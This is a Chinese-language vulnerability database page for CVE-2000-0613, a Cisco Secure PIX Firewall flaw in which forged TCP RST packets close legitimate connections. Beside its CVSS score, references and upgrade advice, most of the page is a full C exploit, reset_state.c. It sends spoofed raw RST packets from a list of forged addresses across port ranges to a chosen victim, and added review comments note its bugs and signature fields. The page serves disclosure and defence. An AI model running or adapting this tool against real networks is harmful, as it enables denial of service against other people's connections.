CVE-2000-0613
CVSS5.0
发布时间 :2000-03-20 00:00:00
修订时间 :2008-09-10 15:05:12
NMCOE    

[原文]Cisco Secure PIX Firewall does not properly identify forged TCP Reset (RST) packets, which allows remote attackers to force the firewall to close legitimate connections.


[CNNVD]Cisco Secure PIX防火墙伪造TCP RST漏洞(CNNVD-200003-038)

        Cisco Secure PIX防火墙存在漏洞,不能正确辨识伪造的TCP复位包(RST),远程攻击者可以利用这个漏洞迫使防火墙关闭合法连接。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0613
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0613
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-038
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=B3D6883199DBD311868100A0C9FC2CDC046B72@protea.citec.net
(VENDOR_ADVISORY)  BUGTRAQ  20000320 PIX DMZ Denial of Service - TCP Resets
http://xforce.iss.net/static/4928.php
(UNKNOWN)  XF  cisco-pix-firewall-tcp
http://www.securityfocus.com/bid/1454
(UNKNOWN)  BID  1454
http://www.osvdb.org/1457
(UNKNOWN)  OSVDB  1457
http://www.cisco.com/warp/public/707/pixtcpreset-pub.shtml
(UNKNOWN)  CISCO  20000711 Cisco Secure PIX Firewall TCP Reset Vulnerability

- 漏洞信息

Cisco Secure PIX防火墙伪造TCP RST漏洞
中危 访问验证错误
2000-03-20 00:00:00 2005-07-27 00:00:00
远程※本地  
        Cisco Secure PIX防火墙存在漏洞,不能正确辨识伪造的TCP复位包(RST),远程攻击者可以利用这个漏洞迫使防火墙关闭合法连接。

- 公告与补丁

        Cisco plans to release updated PIX software to deal with these issues. See the Cisco advisory on this issue for details.

- 漏洞信息 (20067)

PIX Firewall 2.7/3.x/4.x/5 Forged TCP RST Vulnerability (EDBID:20067)
hardware remote
2000-07-10 Verified
0 Citec Network Securities
source: http://www.securityfocus.com/bid/1454/info

A connection through a Cisco Secure PIX Firewall can be reset by a third party if the source and destination IP addresses and ports of the connection can be determined or inferred. This can be accomplished by sending a forged TCP Reset (RST) packet to the firewall, containing the same source and destination addresses and ports (in the TCP packet header) as the connection to be disrupted. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this.


/* reset_state.c (c) 2000 Citec Network Securities */
/* The code following below is copyright Citec Network Securities */
/* Code was developed for testing, and is written to compile under */
/* FreeBSD */

#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>

/*
 * Singly linked list of spoofed source addresses, one node per line
 * accepted from the spoof file.  main() keeps an extra, empty trailing
 * node whose link is NULL as a sentinel and stops its send loop there,
 * so the last node never carries a real address.  Nodes are malloc()ed
 * in main() and never freed.
 */
struct slist {
	struct in_addr  spoof;		/* Address placed in the forged ip_src */
	struct slist   *link;		/* Next node; NULL only on the sentinel */
};					/* Spoof list */

/*
 * main - entry point of the Citec reset_state.c test program.
 *
 * Reads one IPv4 address per line from argv[1] (fgets() into a 25-byte
 * buffer, parsed with inet_aton()) into a struct slist, then for every
 * listed address and for every (source port, destination port) pair in
 * the two ranges taken from argv[3..6] with atoi() writes one
 * 40-byte IPv4+TCP segment with only TH_RST set to a raw IP_HDRINCL
 * socket, addressed to argv[2].
 *
 * Returns 1 after the list has been walked; exit(-1) on argument,
 * allocation, fopen, socket or setsockopt failure.
 *
 * NOTE(review): the argument guard tests argc < 6 while argv[6] is read
 * unconditionally, so argc == 6 passes the check and atoi() receives
 * NULL (undefined behaviour).  The usage text itself lists six operands.
 *
 * NOTE(review), what the emitted packet looks like as written -- these
 * constant fields are what a defender would key a signature on:
 * ip_id = htons(getpid()), ip_ttl 255, ip_tos 0, ip_off 0, ip_sum 0,
 * then a TCP header with th_flags == TH_RST, th_win 512, random
 * seq/ack, no options.  th_sum is never assigned and keeps the 0 from
 * the bzero(), so no TCP checksum is computed anywhere in this program.
 * The program never reads the sendto() return value, so send failures
 * are invisible; nothing is freed or closed before return.
 */
int
main(int argc, char *argv[])
{

	int i, int2;			/* Source / destination port loop counters */
	int             sock;		/* Socket stuff */
	int             on = 1;		/* Socket stuff */
	struct sockaddr_in sockstruct;	/* Socket stuff */
	struct ip      *iphead;		/* IP Header pointer */
	struct tcphdr  *tcphead;	/* TCP Header pointer */
	char            evilpacket[sizeof(struct ip) + sizeof(struct
tcphdr)];
					/* Our reset packet */
	int             seq, ack;	/* Sequence and Acknowledgement #'s
*/
	FILE           *spooffile;	/* Spoof file */
	char           *buffer;		/* Spoof file read buffer */
	struct slist   *scur, *sfirst;	/* Spoof linked list pointers */
	char src[20], dst[20];		/* Work around for inet_ntoa static
*/
					/* Pointers when using printf() */
	int sourcefrom, sourceto, destfrom, destto;	/* CMD Line ports */
	int target;			/* Target address from inet_addr()
*/
					/* NOTE(review): declared but never
					 * used; the target goes straight
					 * into iphead->ip_dst below */


	/* NOTE(review): six operands means argc == 7; see header note */
	if(argc < 6) {
		fprintf(stderr, "Usage: %s spoof_file target sps spe dps
dpe\n"
		"target = your victim\n"
		"sps = Source port start\n"
		"spe = Source port end\n"
		"dps = Destination port start\n"
		"dpe = Destination port end\n", argv[0]);
		exit(-1);
		}
	else {
		/* atoi(): no error reporting, non-numeric input yields 0 */
		sourcefrom = atoi(argv[3]);
		sourceto = atoi(argv[4]);
		destfrom = atoi(argv[5]);
		destto = atoi(argv[6]);
		};
	
	/* Only the ordering of each range is checked; the values are not
	 * confined to 0..65535 before the htons() casts below */
	if(sourcefrom > sourceto) {
		printf("Error, start source port must be less than end
source port\n");
		exit(-1);
		}
	else if(destfrom > destto) {
		printf("Error, start dest port must be less than end dest
port\n");
		exit(-1);
		};

	printf("Used spoof file %s\n"
	       "Destination: [%s] ports: [%d -> %d]\n"
	       "Target source ports: [%d -> %d]\n",
		argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);

	sleep(1);			/* One-second pause after the banner */

	bzero(evilpacket, sizeof(evilpacket));
					/* Clean our reset packet -- every
					 * header field not set later
					 * (including th_sum) stays 0 */

	sfirst = malloc(sizeof(struct slist));	/* Unchecked allocation */
	scur = sfirst;
	scur->link = NULL;		/* Setup our spoof linked list */

	if(!(buffer = malloc(25))) {
		perror("malloc");
		exit(-1);
		};			/* Allocate for read buffer */

	/* NOTE(review): a FILE pointer is compared with <= 0; this works as
	 * a NULL test in practice but relational comparison of a pointer
	 * against zero is not portable C */
	if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
		perror("fopen");
		exit(-1);		/* Open our spoof file */
	} else {
		/* Each line is read with the trailing newline still in
		 * the buffer and handed to inet_aton() as is; a line longer
		 * than 24 bytes is split over several fgets() calls */
		while (fgets(buffer, 25, spooffile)) { 	/* Read till EOF */
			if (!(inet_aton(buffer, &(scur->spoof))))
				printf("Invalid address found in victim
file.. ignoring\n");
			else {
				/* Append a fresh empty node; the node just
				 * filled stays in the list and the new one
				 * becomes the NULL-linked sentinel */
				scur->link = malloc(sizeof(struct slist));
				scur = scur->link;
				scur->link = NULL;	/* Cycle l.list */
				}
			};		/* End of while loop */
		};		/* End of if {} else {} */
	

	free(buffer);			/* Free up our read buffer */
	fclose(spooffile);		/* Close our spoof file */
	scur = sfirst;			/* Set spoof list current to first
*/

	/* Raw IP socket; the program supplies the whole IP header itself
	 * (IP_HDRINCL below).  Presumably needs elevated privilege on the
	 * systems it targets -- OS-specific, not shown here */
	if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("socket");
		exit(-1);
	}				/* Allocate our raw socket */

	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on,
sizeof(on)) < 0) {
		perror("setsockopt");
		exit(-1);
	}				/* Set socket options for raw iphead
*/

	/* Only sin_family, sin_port and sin_addr are ever assigned; the
	 * remaining members of sockstruct are left uninitialised */
	sockstruct.sin_family = AF_INET;
	iphead = (struct ip *) evilpacket;
	tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
					/* Align ip and tcp headers */

	iphead->ip_hl = 5;		/* Ip header length is 5 */
	iphead->ip_v = 4;		/* ipv4 */
	iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
					/* Length of our total packet --
					 * stored in host byte order, no
					 * htons(); whether the raw socket
					 * expects that is OS-specific
					 * (the file says FreeBSD) */
	iphead->ip_id = htons(getpid());	/* Packet ID == PID # */
	iphead->ip_ttl = 255;			/* Time to live == 255 */
	iphead->ip_p = IPPROTO_TCP;		/* TCP Packet */
	iphead->ip_sum = 0;			/* No checksum -- never
						 * computed in this program */
	iphead->ip_tos = 0;			/* 0 Type of Service */
	iphead->ip_off = 0;			/* Offset is 0 */
	tcphead->th_win = htons(512);		/* TCP Window is 512 */
	tcphead->th_flags = TH_RST;		/* Reset packet */
	tcphead->th_off = 0x50;			/* TCP Offset 0x50 */
					/* NOTE(review): th_off is presumably
					 * the 4-bit data-offset bitfield of
					 * the BSD tcphdr (definition not
					 * shown); 0x50 does not fit in four
					 * bits, so the stored value is
					 * implementation-defined rather
					 * than the 5 (20-byte header) the
					 * comment seems to intend -- confirm
					 * against <netinet/tcp.h> */

	iphead->ip_dst.s_addr = inet_addr(argv[2]);	/* Return value
							 * unchecked */

	srand(getpid());			/* Seed for rand() */
	/* Walk every real node; the NULL-linked sentinel ends the loop */
	while (scur->link != NULL) {
		seq = rand() % time(NULL);	/* Randomize our #'s */
		ack = rand() % time(NULL);	/* Randomize ack #'s */
		sockstruct.sin_port = htons(rand() % time(NULL));
		iphead->ip_src = scur->spoof;	/* Set the spoofed address
*/
		/* NOTE(review): the sendto() destination is the spoofed
		 * *source* address, not argv[2]; the target is only in
		 * iphead->ip_dst.  How the kernel reconciles the two under
		 * IP_HDRINCL is OS-specific -- TODO confirm for FreeBSD */
		sockstruct.sin_addr = scur->spoof;
		for(i = sourcefrom; i <= sourceto; i++) {
			for(int2 = destfrom; int2 <= destto; int2++) {
				usleep(2);	/* usleep(2) is 2 us, not the
						 * 5 ms the original comment
						 * claimed
*/
				seq += (rand() %10)+250;
				ack += (rand() %10)+250;
				tcphead->th_seq = htonl(seq);
						/* Set sequence number */
				tcphead->th_ack = htonl(ack);
						/* Set ack number */
				tcphead->th_dport = htons(int2);
						/* Set destination port */
				tcphead->th_sport = htons(i);
						/* Set source port */
				snprintf(src, 20, "%s",
inet_ntoa(iphead->ip_src));
				snprintf(dst, 20, "%s",
inet_ntoa(iphead->ip_dst));
				/* Copy info to src and dst for printing */
				printf("TCP RESET: [%s:%d] -> [%s:%d]\n",
src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
				/* Return value ignored: a failed or
				 * short send is not reported */
				sendto(sock, &evilpacket,
sizeof(evilpacket), 0x0,
			       		(struct sockaddr *) & sockstruct,
sizeof(sockstruct));
						/* Send our evil packet */
				};
			};
		scur = scur->link;		/* Cycle the spoof ips */
		}
		scur = sfirst;		/* Reset the cursor; list is not freed */
	return (1);			/* Non-zero exit status even on success */

};











		

- 漏洞信息

1457
Cisco PIX Firewall Forged TCP RST
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Cisco PIX contains a flaw that may allow a malicious user to terminate connections. The issue is triggered when an attacker sends a forged RST packet. The flaw may allow arbitrary connections to be reset, resulting in a loss of availability.

- 时间线

2000-03-20 2000-03-20
Unknown Unknown

- 解决方案

Upgrade to version indicated by Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
